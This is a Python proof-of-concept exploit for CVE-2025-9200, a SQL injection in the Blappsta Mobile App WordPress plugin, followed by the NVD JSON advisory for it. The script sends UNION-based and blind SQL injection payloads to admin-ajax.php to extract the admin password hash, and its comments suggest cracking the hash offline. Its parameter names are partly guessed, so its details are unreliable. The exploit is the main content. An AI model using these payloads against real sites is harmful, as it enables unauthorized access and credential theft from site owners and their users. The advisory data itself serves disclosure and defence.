CVE-2025-9200

# CVE-2025-9200 PoC - Blappsta Mobile App Plugin SQL Injection # Vulnerability: SQL Injection in nh_ynaa_comments() function # Affected versions: <= 0.8.8.8 import requests TARGET_URL = "http://target-wordpress-site.com" # The vulnerable endpoint is typically accessed via WordPress AJAX or REST API # The nh_ynaa_comments() function is triggered through the plugin's mobile app sync mechanism def exploit_sql_injection(target_url): """ Exploit SQL injection in Blappsta Mobile App Plugin's nh_ynaa_comments() function. The vulnerability allows unauthenticated attackers to append SQL queries. """ # Step 1: Identify the vulnerable parameter (typically a comment ID or similar parameter) # The injection point is in parameters passed to nh_ynaa_comments() function # Step 2: Craft UNION-based SQL injection payload to extract admin credentials # Example payload to extract WordPress admin password hash payload = "1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- -" # Step 3: Send the malicious request # The endpoint is typically triggered via AJAX action or REST API route params = { "action": "nh_ynaa_comments", # or similar action name "id": payload, # vulnerable parameter } headers = { "User-Agent": "Mozilla/5.0 (compatible; Blappsta/1.0)", "X-Requested-With": "XMLHttpRequest" } response = requests.get( f"{target_url}/wp-admin/admin-ajax.php", params=params, headers=headers ) # Step 4: Extract sensitive information from response if response.status_code == 200: print(f"[+] Response: {response.text}") # The admin password hash would be in the response # Can be cracked offline using tools like hashcat or john return response.text # Alternative: Boolean-based blind SQL injection def blind_sql_injection(target_url): """ Boolean-based blind SQL injection to extract data character by character. """ extracted_data = "" # Extract database name length payload = "1 AND (SELECT LENGTH(database()))>0-- -" params = { "action": "nh_ynaa_comments", "id": payload, } response = requests.get( f"{target_url}/wp-admin/admin-ajax.php", params=params ) return response.text if __name__ == "__main__": # Run exploitation result = exploit_sql_injection(TARGET_URL) print(f"Exploitation result: {result}")

{"cve": {"id": "CVE-2025-9200", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:46.717", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blappsta Mobile App Plugin – Your native, mobile iPhone App and Android App plugin for WordPress is vulnerable to SQL Injection via the nh_ynaa_comments() function in all versions up to, and including, 0.8.8.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://wordpress.org/plugins/yournewsapp/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9169931c-a679-4801-b33b-08c4f464dc43?source=cve", "source": "[email protected]"}]}}